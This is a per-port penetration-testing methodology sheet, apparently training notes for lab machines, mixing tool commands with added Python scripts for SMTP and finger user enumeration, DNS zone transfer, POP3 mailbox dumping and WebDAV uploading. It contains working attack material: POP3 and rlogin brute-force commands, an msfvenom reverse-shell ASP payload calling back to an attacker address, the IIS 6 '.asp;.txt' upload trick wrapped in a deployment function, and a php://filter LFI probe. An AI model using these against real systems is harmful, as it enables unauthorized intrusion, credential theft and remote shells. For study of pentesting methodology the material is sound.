The-Process

Below is the Process: the steps to follow based on the situation that presents itself during a pentest.

Before assuming that a port is only serving one protocol, use amap to check whether multiple services answer on the same port.

amap 192.168.254.15 12380

Protocol on 192.168.254.15:12380/tcp matches http
Protocol on 192.168.254.15:12380/tcp matches http-apache2
Protocol on 192.168.254.15:12380/tcp matches ntp
Protocol on 192.168.254.15:12380/tcp matches ssl

As we can see, on port 12380 amap matches HTTP, NTP and SSL. We would not have known this otherwise! Treat each match as a lead to confirm by hand (e.g. openssl s_client -connect IP:12380 for the SSL hit) rather than as proof: amap matches on response patterns, and a match like NTP on a web port is often a false positive.
=================================================
TCP Port 21 - FTP
nmap -sV -sC 10.11.1.8 -p 21
Banner grab - nmap -v -p 21 -sV x.x.x.x --script=banner

Try logging in anonymously:
lftp anonymous@IP
No password (hit Enter). If that is rejected, try an email address as the password (the anonymous FTP convention) and the ftp/ftp pair.

=================================================

TCP Port 22 - SSH
How to use a different key exchange algorithm (needed when ssh refuses with "no matching key exchange method found")?
ssh -oKexAlgorithms=<algorithm> user@IP

e.g.
ssh -oKexAlgorithms=diffie-hellman-group-exchange-sha1 user@IP

The same approach works for old host key and cipher types (-oHostKeyAlgorithms=+ssh-dss, -oCiphers=+aes128-cbc). List what the server actually offers with nmap -p 22 --script ssh2-enum-algos IP.


=================================================

TCP Port 23
=================================================


 
=================================================
TCP Port 25 - SMTP
SMTP username enumeration

Check for username enumeration:

smtp-user-enum -M VRFY -U /usr/share/wordlists/Seclists/Usernames/Names/names.txt -t 10.11.1.229

If VRFY is refused, try the other methods: -M EXPN and -M RCPT. RCPT TO is the one most often left working because mail delivery depends on it.

Test manually whether VRFY is allowed (HELO needs an argument, as the 501 shows):

telnet 10.11.1.229 25
Trying 10.11.1.229...
Connected to 10.11.1.229.
Escape character is '^]'.
220 MAIL ESMTP
HELO
501 HELO Invalid domain address.
HELO x
250 Hello.
VRFY root
502 VRFY disallowed.
VRFY blah
502 VRFY disallowed.
HELP
211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY

Note that HELP still lists VRFY even though the server answers 502 for it, so the HELP output is not a reliable guide; test each verb yourself.
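The manual test above only checks one verb. The following is an added example (not code from the original page and not smtp-user-enum itself) that automates the same probing with the fallback order VRFY, EXPN, RCPT TO and interprets the reply codes: 250/251 confirms a mailbox, 5xx "disallowed" codes move on to the next method, and 252 ("cannot verify but will accept") is treated as non-discriminating. The FakeSMTPSocket class is a constructed server that mirrors the transcript (VRFY disabled, RCPT TO leaking users); the target address, domain and wordlist are placeholders.

```python
"""SMTP username enumeration: VRFY, then EXPN, then RCPT TO (added example, not the page's code).
FakeSMTPSocket is a constructed server used for the demo; host, domain and wordlist are placeholders."""
import socket

POSITIVE = {"250", "251"}            # mailbox confirmed
DISABLED = {"500", "502", "503"}     # verb not implemented / refused: move to the next method
# 252 = "cannot VRFY but will accept": the server answers that for every name, so the
# method does not discriminate and is treated like DISABLED.


class SMTPSession:
    """Line-oriented SMTP client over any object with sendall()/recv()."""

    def __init__(self, sock):
        self.sock, self.buf = sock, b""

    def read_reply(self):
        """Return (code, last_line) of a possibly multi-line reply ('250-...' lines continue)."""
        while True:
            while b"\n" not in self.buf:
                chunk = self.sock.recv(4096)
                if not chunk:
                    raise ConnectionError("server closed the connection")
                self.buf += chunk
            line, _, self.buf = self.buf.partition(b"\n")
            line = line.decode("latin-1").rstrip("\r")
            if len(line) < 4 or line[3] != "-":
                return line[:3], line

    def cmd(self, text):
        self.sock.sendall((text + "\r\n").encode())
        return self.read_reply()


def enumerate_users(sock, users, domain="localhost", methods=("VRFY", "EXPN", "RCPT")):
    """Return {user: (method, reply)} for every name the server confirms."""
    s = SMTPSession(sock)
    s.read_reply()                                   # 220 banner
    code, line = s.cmd("HELO x")                     # HELO needs an argument (501 otherwise)
    if not code.startswith("2"):
        raise RuntimeError("HELO rejected: " + line)
    found = {}
    for method in methods:
        if method == "RCPT":                         # RCPT TO needs an envelope sender first
            code, _ = s.cmd("MAIL FROM:<probe@%s>" % domain)
            if not code.startswith("2"):
                continue
        usable = True
        for user in users:
            if method == "RCPT":
                code, line = s.cmd("RCPT TO:<%s@%s>" % (user, domain))
            else:
                code, line = s.cmd("%s %s" % (method, user))
            if code in DISABLED or code == "252":
                usable = False                       # this verb tells us nothing; try the next
                break
            if code in POSITIVE:
                found[user] = (method, line)
        if method == "RCPT":
            s.cmd("RSET")
        if usable:                                   # one discriminating method is enough
            break
    s.cmd("QUIT")
    return found


class FakeSMTPSocket:
    """Constructed server: VRFY/EXPN disabled (as in the transcript), RCPT TO leaks valid users."""
    VALID = {"john", "mindy"}

    def __init__(self):
        self.out = b"220 MAIL ESMTP\r\n"

    def sendall(self, data):
        line = data.decode().strip()
        verb = line.split(" ", 1)[0].upper()
        if verb in ("VRFY", "EXPN"):
            reply = "502 %s disallowed." % verb
        elif verb == "RCPT":
            user = line.split("<", 1)[1].split("@", 1)[0]
            reply = "250 OK" if user in self.VALID else "550 No such user here"
        elif verb == "QUIT":
            reply = "221 Bye"
        else:
            reply = "250 Hello."
        self.out += (reply + "\r\n").encode()

    def recv(self, n):
        data, self.out = self.out[:n], self.out[n:]
        return data


def demo():
    """Run the enumeration against the constructed server with a small constructed wordlist."""
    return enumerate_users(FakeSMTPSocket(), ["root", "john", "mindy", "admin", "mysql"])


if __name__ == "__main__":
    # Live use (placeholder address): enumerate_users(socket.create_connection(("10.11.1.229", 25), 10), users)
    print(demo())
```

If RCPT TO returns 250 for every name in the list, the server accepts all recipients at that stage (catch-all or deferred verification) and that method is not telling you anything either; the names then have to be confirmed another way, for example with the POP3 login attempts further down.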

=================================================
TCP Port 53 - DNS related testing (when open on TCP this is usually to facilitate zone transfers)

TCP port 53 is unusual because normal lookups use UDP 53; TCP is used for zone transfers (AXFR) and for answers too large for a UDP packet.

nslookup
> server IP       - point nslookup at the target name server
> 127.0.0.1       - see what the server returns for localhost (a reverse lookup)
> IP              - try the IP of the box you are testing
> test.com        - any hostname that seems logical for the box and might help

Reverse-lookup sweeps with dnsrecon (-r is the range, -n the name server to ask; IP can be 192.168.1.1 or whatever you are testing):
dnsrecon -r 127.0.0.0/24 -n IP

also try..
dnsrecon -r 127.0.1.0/24 -n IP

next try the whole subnet; you can also try /16 and /8 as needed:
dnsrecon -r 192.168.1.0/24 -n 192.168.1.1

Next try a zone transfer with dig, giving the DNS server address after @ (here 192.168.1.2). AXFR needs a zone name; without one dig asks for the root zone, which no internal server will hand over, so use a domain learned from the steps above:
dig axfr test.com @192.168.1.2

OR
dig axfr @192.168.1.2 test.com

"; Transfer failed." means the server refused AXFR for that zone (or for your address); a full record listing means the whole zone leaked, including internal hostnames to add to your hosts file.
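To show what dig is doing on the wire, here is an added example (not code from the original page, and not dig or dnsrecon) that performs an AXFR over TCP with the standard library only and parses the returned records, including compressed names. The server and zone names are placeholders and sample_axfr_response() is a constructed answer for test.com, not a capture.

```python
"""Raw DNS zone transfer (AXFR) over TCP, standard library only (added example, not the page's code).
Server/zone names are placeholders; sample_axfr_response() is constructed, not captured."""
import socket
import struct

QTYPE_AXFR = 252
TYPE_NAMES = {1: "A", 2: "NS", 5: "CNAME", 6: "SOA", 12: "PTR", 15: "MX", 16: "TXT", 28: "AAAA"}


def encode_name(name):
    """Wire-format a dotted name: length-prefixed labels ending in a zero byte."""
    out = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.strip(".").split(".") if l)
    return out + b"\x00"


def build_axfr_query(zone, txid=0x1234):
    header = struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0)      # one question, no flags needed
    return header + encode_name(zone) + struct.pack(">HH", QTYPE_AXFR, 1)


def decode_name(msg, off):
    """Decode a (possibly compressed) name at msg[off]; return (name, offset after it)."""
    labels, end, hops = [], None, 0
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                               # pointer into an earlier name
            if end is None:
                end = off + 2                                   # the name ends after the first pointer
            off = struct.unpack(">H", msg[off:off + 2])[0] & 0x3FFF
            if (hops := hops + 1) > 64:
                raise ValueError("compression pointer loop")
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels) + ".", (end if end is not None else off)


def render_rdata(msg, rtype, off, rdata):
    if rtype == 1 and len(rdata) == 4:
        return ".".join(str(b) for b in rdata)
    if rtype in (2, 5, 12):                                     # NS / CNAME / PTR hold a name
        return decode_name(msg, off)[0]
    if rtype == 15:
        return "%d %s" % (struct.unpack(">H", rdata[:2])[0], decode_name(msg, off + 2)[0])
    if rtype == 16:
        return rdata[1:1 + rdata[0]].decode("latin-1")
    return rdata.hex()                                          # SOA and everything else: raw


def parse_message(msg):
    """Return (rcode, [(name, type, ttl, rdata_text), ...]) for one DNS message."""
    _, flags, qd, an, ns, ar = struct.unpack(">HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):                                         # skip the question section
        off = decode_name(msg, off)[1] + 4
    records = []
    for _ in range(an + ns + ar):
        name, off = decode_name(msg, off)
        rtype, _, ttl, rdlen = struct.unpack(">HHIH", msg[off:off + 10])
        off += 10
        records.append((name, TYPE_NAMES.get(rtype, str(rtype)), ttl,
                        render_rdata(msg, rtype, off, msg[off:off + rdlen])))
        off += rdlen
    return flags & 0xF, records


def recv_exact(sock, n):
    data = b""
    while len(data) < n:
        chunk = sock.recv(n - len(data))
        if not chunk:
            raise ConnectionError("server closed the connection mid-transfer")
        data += chunk
    return data


def axfr(server, zone, port=53, timeout=10):
    """Request the zone over TCP and collect records until the closing SOA arrives."""
    query = build_axfr_query(zone)
    records, soa_seen = [], 0
    with socket.create_connection((server, port), timeout) as s:
        s.sendall(struct.pack(">H", len(query)) + query)        # DNS over TCP is length-prefixed
        while soa_seen < 2:                                     # a zone starts and ends with its SOA
            msg = recv_exact(s, struct.unpack(">H", recv_exact(s, 2))[0])
            rcode, recs = parse_message(msg)
            if rcode != 0 or not recs:                          # 5 = REFUSED, 9 = NOTAUTH
                raise RuntimeError("zone transfer refused (RCODE %d)" % rcode)
            soa_seen += sum(1 for r in recs if r[1] == "SOA")
            records.extend(recs)
    return records


def sample_axfr_response():
    """Constructed AXFR answer for test.com (four RRs, using name compression)."""
    ptr = b"\xc0\x0c"                                           # pointer to "test.com" in the question
    soa = b"\x03ns1" + ptr + b"\x0ahostmaster" + ptr + struct.pack(">IIIII", 1, 3600, 900, 604800, 86400)
    rr = lambda name, rtype, rdata: name + struct.pack(">HHIH", rtype, 1, 3600, len(rdata)) + rdata
    return (struct.pack(">HHHHHH", 0x1234, 0x8400, 1, 4, 0, 0)
            + encode_name("test.com") + struct.pack(">HH", QTYPE_AXFR, 1)
            + rr(ptr, 6, soa) + rr(ptr, 1, bytes([192, 168, 1, 2]))
            + rr(b"\x03www" + ptr, 5, ptr) + rr(ptr, 6, soa))
```

Against a live server you would call axfr("192.168.1.2", "test.com"); the refusal that dig reports as "Transfer failed." surfaces here as RCODE 5. Note that the loop stops on the second SOA, which is how a client knows the transfer is complete even when the zone is split across several TCP messages.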

=================================================
TCP Port 79 - Finger (which users exist, and who is or has been logged in to the system)

1) Download finger-user-enum.pl
wget https://raw.githubusercontent.com/pentestmonkey/finger-user-enum/master/finger-user-enum.pl

1.1) perl finger-user-enum.pl -U /usr/share/wordlists/SecLists/Usernames/Names/names.txt -t 10.10.10.76 | less -S

Getting the results can take AGES! Be PATIENT!
While waiting, you can run several instances: create a users.txt file with names that could be relevant based on other enumeration and run a second copy against that.

1.2) Once we have results we are looking for "pts/2" or "pts/3" (the terminal they logged in on) plus the time and the source address. This tells us that these accounts exist and are either currently logged in or have logged in recently.
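Because the finger protocol is just "send the name, read the reply", the slow part is waiting on one connection at a time. The following is an added example (not code from the original page, and not finger-user-enum.pl) that queries many names in parallel and classifies each reply the way step 1.2 describes; the "no such user" / "In real life: ???" wording it keys on is an assumption based on the Linux and Solaris finger daemons, the replies in FAKE_REPLIES are constructed, and the target address is a placeholder.

```python
"""Parallel finger user enumeration (added example, not the page's code).
Reply-text heuristics assume Linux/Solaris fingerd wording; FAKE_REPLIES are constructed."""
import socket
from concurrent.futures import ThreadPoolExecutor


def finger_query(host, user, port=79, timeout=10):
    """Send one finger request ('user\\r\\n') and return the daemon's reply as text."""
    with socket.create_connection((host, port), timeout) as s:
        s.sendall((user + "\r\n").encode())
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(chunks).decode("latin-1")


def classify(reply):
    """None if the account does not exist; otherwise whether a login terminal was reported."""
    low = reply.lower()
    if "no such user" in low or "in real life: ???" in low:     # Linux / Solaris unknown-user wording
        return None
    active = " pts/" in reply or " tty" in reply                  # step 1.2: a terminal means a login
    return "logged in / recent login" if active else "exists"


def enumerate_finger(users, query, workers=10):
    """Run query(user) for every name concurrently; return {user: verdict} for existing accounts."""
    results = {}
    with ThreadPoolExecutor(max_workers=workers) as pool:
        for user, reply in zip(users, pool.map(query, users)):
            verdict = classify(reply)
            if verdict:
                results[user] = verdict
    return results


# Constructed replies for the demo (not captured from a real host).
FAKE_REPLIES = {
    "root": "Login: root           Name: root\nDirectory: /root      Shell: /bin/bash\nNever logged in.\n",
    "sunny": ("Login name: sunny     In real life: sunny\nDirectory: /export/home/sunny  Shell: /bin/bash\n"
              "Last login Wed Apr 13 15:35 on pts/3 from 10.10.14.3\n"),
}


def demo():
    def fake_query(user):
        return FAKE_REPLIES.get(user, "Login name: %s     In real life: ???\n" % user)
    return enumerate_finger(["root", "sunny", "admin", "mysql"], fake_query)


if __name__ == "__main__":
    # Live use (placeholder address): enumerate_finger(names, lambda u: finger_query("10.10.10.76", u))
    print(demo())
```

Keep the worker count modest against a real target; some finger daemons run under inetd with a connection rate limit, and a flood of parallel connections simply gets you empty replies.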










=================================================
TCP Port 80 (or any HTTP listening service)
nmap -sC -sV -A -p 80 ip
nikto -h http://ip
dirbuster first, as it seems to give better performance
dirsearch - test with "-f" (--force-extensions): it appends each extension to every wordlist entry, so requests hit real files (200) instead of bare directory names that only redirect (302).

If all responses are returning '200 OK' then start to wfuzz. Go to the Wfuzz page
https://sql--injection.blogspot.com/p/wfuzz.html

If there is a /cgi-bin/ folder then search for .sh and .py files (and .cgi / .pl)!

Add a logical name into the 'hosts' file and re-check the site (name-based virtual hosts serve different content for different Host headers).
Check for WebDAV - nmap -T4 -p80 --script=http-iis-webdav-vuln 10.11.1.229
If it is enabled, run davtest - davtest -url http://10.11.1.229
then cadaver - cadaver http://10.11.1.229

If the site uses extensions like .php then add the extension option: dirsearch "-e php" or dirb "-X .php"


Test for the HTTP PUT method - curl -X OPTIONS http://IP:PORT -v (look at the Allow: header in the response)

If PUT is available..
Upload a file - curl -i -X PUT --data-binary @"/directory/to/file" http://IP:PORT/path/file.ext
(--data-binary keeps the file byte for byte, whereas -d strips newlines; name the target file in the URL, otherwise the server has nothing to create.)
Read the source code --> Any comments? --> Any hint of a WordPress or Joomla site?

If Joomla - run joomscan
If WordPress - wpscan --> Go to the WordPress section

If the page URL doesn't end with an extension (e.g. http://test/index), the app is probably including a file named by a parameter; try a PHP filter in that parameter to read the source base64-encoded:
php://filter/convert.base64-encode/resource=index

Got a login portal? Go to WEB LOGIN





=================================================
TCP Port 110 - POP3 - Read email with the LIST and RETR commands
# Try to brute-force POP3 logins (pop3-brute uses nmap's default name/password lists unless you pass --script-args userdb=...,passdb=...)
nmap -sV --script=pop3-brute 10.10.10.51

Example
110/tcp open  pop3    JAMES pop3d 2.3.2
| pop3-brute:
|   Accounts: No valid accounts found
|   Statistics: Performed 19457 guesses in 404 seconds, average tps: 47.2
|_  ERROR: Failed to connect.

root@kali:~# telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER john
+OK
PASS john
+OK Welcome john
list
+OK 1 743
1 743
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <john@localhost>;
          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James

.

The mail names another account (mindy) and mentions a temporary password: feed both back into the username list and the POP3 / SSH login attempts.
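Reading one mailbox by hand is fine; for several accounts it is quicker to script the USER/PASS/LIST/RETR sequence from the transcript. The following is an added example (not code from the original page) of a minimal POP3 client that does exactly that and handles the one detail telnet hides: multi-line replies end with a lone "." and any body line beginning with "." is sent doubled ("dot-stuffing"), so the client must strip one dot back off. FakePOP3Socket is a constructed server with one message, and the credentials and host are placeholders.

```python
"""Minimal POP3 mailbox dump: USER, PASS, LIST, RETR (added example, not the page's code).
FakePOP3Socket is a constructed server; host and credentials are placeholders."""
import socket


class POP3Client:
    """Line-oriented POP3 client over any object with sendall()/recv()."""

    def __init__(self, sock):
        self.sock, self.buf = sock, b""
        self.banner = self.readline()                # "+OK ... POP3 server ready"

    def readline(self):
        while b"\r\n" not in self.buf:
            chunk = self.sock.recv(4096)
            if not chunk:
                raise ConnectionError("server closed the connection")
            self.buf += chunk
        line, _, self.buf = self.buf.partition(b"\r\n")
        return line.decode("latin-1")

    def cmd(self, line):
        """Send a command and return its status line; raise on -ERR (e.g. bad password)."""
        self.sock.sendall((line + "\r\n").encode())
        reply = self.readline()
        if not reply.startswith("+OK"):
            raise RuntimeError("%s -> %s" % (line.split(" ")[0], reply))
        return reply

    def read_multiline(self):
        """Read a dot-terminated block and undo dot-stuffing ('..' at line start -> '.')."""
        lines = []
        while True:
            line = self.readline()
            if line == ".":
                return lines
            lines.append(line[1:] if line.startswith(".") else line)

    def login(self, user, password):
        self.cmd("USER " + user)
        self.cmd("PASS " + password)

    def list_messages(self):
        self.cmd("LIST")
        return [(int(n), int(size)) for n, size in (l.split() for l in self.read_multiline())]

    def retr(self, n):
        self.cmd("RETR %d" % n)
        return "\n".join(self.read_multiline())

    def quit(self):
        self.cmd("QUIT")


def dump_mailbox(sock, user, password):
    """Log in and return {message_number: full_message_text}."""
    c = POP3Client(sock)
    c.login(user, password)
    msgs = {n: c.retr(n) for n, _ in c.list_messages()}
    c.quit()
    return msgs


class FakePOP3Socket:
    """Constructed stand-in for a POP3 server with one message (not a captured session)."""
    MESSAGE = ["From: mailadmin@localhost", "Subject: New Hires access", "",
               "Please send mindy a temporary password.",
               "..dotted line survives dot-stuffing"]   # wire form of a body line starting with "."

    def __init__(self):
        self.out = b"+OK solidstate POP3 server ready\r\n"

    def sendall(self, data):
        verb, _, arg = data.decode().strip().partition(" ")
        verb = verb.upper()
        if verb == "USER":
            reply = ["+OK"]
        elif verb == "PASS":
            reply = ["+OK Welcome"] if arg == "john" else ["-ERR Authentication failed."]
        elif verb == "LIST":
            reply = ["+OK 1 743", "1 743", "."]
        elif verb == "RETR" and arg == "1":
            reply = ["+OK Message follows"] + self.MESSAGE + ["."]
        elif verb == "QUIT":
            reply = ["+OK signing off."]
        else:
            reply = ["-ERR"]
        self.out += "".join(l + "\r\n" for l in reply).encode()

    def recv(self, n):
        data, self.out = self.out[:n], self.out[n:]
        return data


def demo():
    return dump_mailbox(FakePOP3Socket(), "john", "john")


if __name__ == "__main__":
    # Live use (placeholder address): dump_mailbox(socket.create_connection(("10.10.10.51", 110), 10), "john", "john")
    print(demo())
```

Because cmd() raises on any -ERR, the same client doubles as a password check: a loop over candidate credentials that catches RuntimeError on PASS is a slower but more transparent alternative to the pop3-brute script above.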

=================================================
TCP Port 111 - RPCbind (and NFS, TCP 2049)
apt install nfs-common

  1. rpcinfo -p 192.168.1.112 | grep nfs
  2. showmount -e 192.168.1.11
  3. If we get an output like..
  4. Export list for 192.168.1.98:
     /home/vulnix *
  5. The * indicates that any IP is allowed to mount it.
  6. mkdir -p /mnt/whatever; mount -t nfs -o nolock 192.168.1.98:/home/vulnix /mnt/whatever
     (the export is always given as server:/path)
  7. If we get "Permission denied" when reading the mounted files, this is usually "root squashing": the server maps our root to nobody, so only the export's real owner can read it. Check the owner uid with ls -ln /mnt/whatever, create a local user with the same uid (useradd -u <uid> squashed) and read the files as that user.
=================================================
TCP Port 135 - MS RPC endpoint mapper
nbtstat -a <target> (Windows tool; it queries the NetBIOS name table over UDP 137. From Linux use nbtscan <target> or nmblookup -A <target>; for the endpoint mapper itself, impacket's rpcdump.py <target> lists the registered interfaces.)


TCP Port 137

TCP Port 139

TCP Port 161

TCP Port 162

TCP Port 443

TCP Port 445
apt-get install smb4k -y


TCP Ports 512,513,514 - rexec / rlogin / rsh
apt-get install rsh-client

# Try to log in as root or as a user found already.
rlogin -l root 192.168.1.98

# If that fails, brute-force it - output is slow but will come.
nmap -p 513 --script rlogin-brute 192.168.1.98 -v




TCP Port 3306

TCP Port 3389


Mail
Username enumeration is done against SMTP (see TCP Port 25), not POP3:
smtp-user-enum -M VRFY -U /usr/share/wordlists/Seclists/Usernames/Names/names.txt -t 10.11.1.229


IIS 6.0 / Server 2003 ASP file upload via WebDAV
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.108 LPORT=4444 -f asp --arch x86 --platform windows > shell_reverse_tcp.asp

Rename the payload to .txt (the WebDAV site refuses PUT of executable extensions), upload it with cadaver, then COPY it to a name ending in .asp;.txt. IIS 6 stops parsing the filename at the semicolon and executes it as ASP:

dav:/> put shell_reverse_tcp.txt
Uploading shell_reverse_tcp.txt to `/shell_reverse_tcp.txt':
Progress: [=============================>] 100.0% of 38349 bytes succeeded.
dav:/> copy shell_reverse_tcp.txt shell_reverse_tcp.asp;.txt
Copying `/shell_reverse_tcp.txt' to `/shell_reverse_tcp.asp%3b.txt':  succeeded.
dav:/>
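The cadaver session above, and the curl OPTIONS / PUT test in the TCP Port 80 section, are the same three HTTP requests: OPTIONS to read the Allow: header, PUT of the .txt, then COPY with a Destination header (note the ";" percent-encoded to %3B, as cadaver shows). The following is an added example (not code from the original page, and not cadaver) that issues them over raw HTTP/1.1 so the full exchange is visible. FakeWebDAVSocket is a constructed stand-in for the IIS 6 site, the host is a placeholder and the payload is a placeholder string, not a real shell.

```python
"""WebDAV PUT + COPY over raw HTTP/1.1 (added example, not the page's code or cadaver's).
FakeWebDAVSocket is a constructed server for the demo; host and payload are placeholders."""
import socket
from urllib.parse import quote, unquote


def http_request(sock, method, path, host, headers=None, body=b""):
    """Send one request on a fresh connection; return (status, headers, body)."""
    hdrs = {"Host": host, "Connection": "close", "Content-Length": str(len(body))}
    hdrs.update(headers or {})
    req = "%s %s HTTP/1.1\r\n%s\r\n" % (method, path, "".join("%s: %s\r\n" % kv for kv in hdrs.items()))
    sock.sendall(req.encode() + body)
    raw = b""
    while b"\r\n\r\n" not in raw:
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("no HTTP response")
        raw += chunk
    head, _, rest = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    status = int(lines[0].split(" ")[1])
    rh = {k.strip().lower(): v.strip() for k, _, v in (l.partition(":") for l in lines[1:])}
    want = int(rh.get("content-length", len(rest)))
    while len(rest) < want:
        chunk = sock.recv(4096)
        if not chunk:
            break
        rest += chunk
    return status, rh, rest[:want]


def allowed_methods(connect, host):
    """The Allow: header that curl -X OPTIONS shows, as a set of method names."""
    _, rh, _ = http_request(connect(), "OPTIONS", "/", host)
    return {m.strip().upper() for m in rh.get("allow", "").split(",") if m.strip()}


def deploy_iis6_asp(connect, host, name, payload):
    """PUT the payload as .txt, then COPY it to name.asp;.txt, which IIS 6 runs as ASP."""
    methods = allowed_methods(connect, host)
    if not {"PUT", "COPY"} <= methods:
        raise RuntimeError("need PUT and COPY; server allows %s" % sorted(methods))
    txt, asp = "/%s.txt" % name, "/%s.asp;.txt" % name
    status, _, _ = http_request(connect(), "PUT", txt, host, {"Content-Type": "text/plain"}, payload)
    if status not in (200, 201, 204):
        raise RuntimeError("PUT failed: %d" % status)
    dest = "http://%s%s" % (host, quote(asp, safe="/"))              # ';' becomes %3B, as in cadaver's output
    status, _, _ = http_request(connect(), "COPY", txt, host, {"Destination": dest, "Overwrite": "T"})
    if status not in (201, 204):
        raise RuntimeError("COPY failed: %d" % status)
    return asp


def live_connect(host, port=80, timeout=10):
    """Connection factory for a real target: each request gets a fresh TCP socket."""
    return lambda: socket.create_connection((host, port), timeout)


class FakeWebDAVSocket:
    """Constructed stand-in for an IIS 6 WebDAV site; calling the class is the 'connect'."""
    store = {}                                                        # path -> bytes, shared across requests

    def __init__(self):
        self.out = b""

    def sendall(self, data):
        head, _, body = data.partition(b"\r\n\r\n")
        lines = head.decode().split("\r\n")
        method, path = lines[0].split(" ")[:2]
        hdrs = {k.strip().lower(): v.strip() for k, _, v in (l.partition(":") for l in lines[1:])}
        if method == "OPTIONS":
            status, extra = 200, "Allow: OPTIONS, TRACE, GET, HEAD, POST, PUT, COPY, MOVE, PROPFIND\r\n"
        elif method == "PUT":
            self.store[unquote(path)] = body
            status, extra = 201, ""
        elif method == "COPY" and unquote(path) in self.store:
            dst = "/" + unquote(hdrs["destination"].split("//", 1)[1].split("/", 1)[1])
            self.store[dst] = self.store[unquote(path)]
            status, extra = 201, ""
        else:
            status, extra = 404, ""
        reason = {200: "OK", 201: "Created"}.get(status, "Not Found")
        self.out = ("HTTP/1.1 %d %s\r\n%sContent-Length: 0\r\n\r\n" % (status, reason, extra)).encode()

    def recv(self, n):
        data, self.out = self.out[:n], self.out[n:]
        return data


def demo():
    """Deploy a constructed placeholder (not a real shell) against the fake server."""
    FakeWebDAVSocket.store.clear()
    payload = b"<% Response.Write(\"placeholder\") %>"
    path = deploy_iis6_asp(FakeWebDAVSocket, "10.11.1.229", "shell_reverse_tcp", payload)
    return path, dict(FakeWebDAVSocket.store)
```

Against the real host the call is deploy_iis6_asp(live_connect("10.11.1.229"), "10.11.1.229", "shell_reverse_tcp", open("shell_reverse_tcp.asp", "rb").read()); a 403 on the PUT means the extension filter caught it (hence the .txt first), and a 403 on the COPY means MOVE/COPY is not granted and the semicolon trick is not available on that site.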



Image Files

exiftool -a -u -g1 FILENAME
binwalk -ME FILENAME




Using PUT to get a shell on IIS 6 - create the payload, upload it renamed to .txt, then copy it to name.asp;.txt (see the IIS 6.0 section above).

Opening Database Files
- .SDF files (SQL Server Compact) can be opened with SQL Compact Query Analyzer
- .MDF files (SQL Server) can be opened with an MDF viewer, or attached to a local SQL Server instance

LFI
Found an LFI, or want to test for one? Use LFISuite.
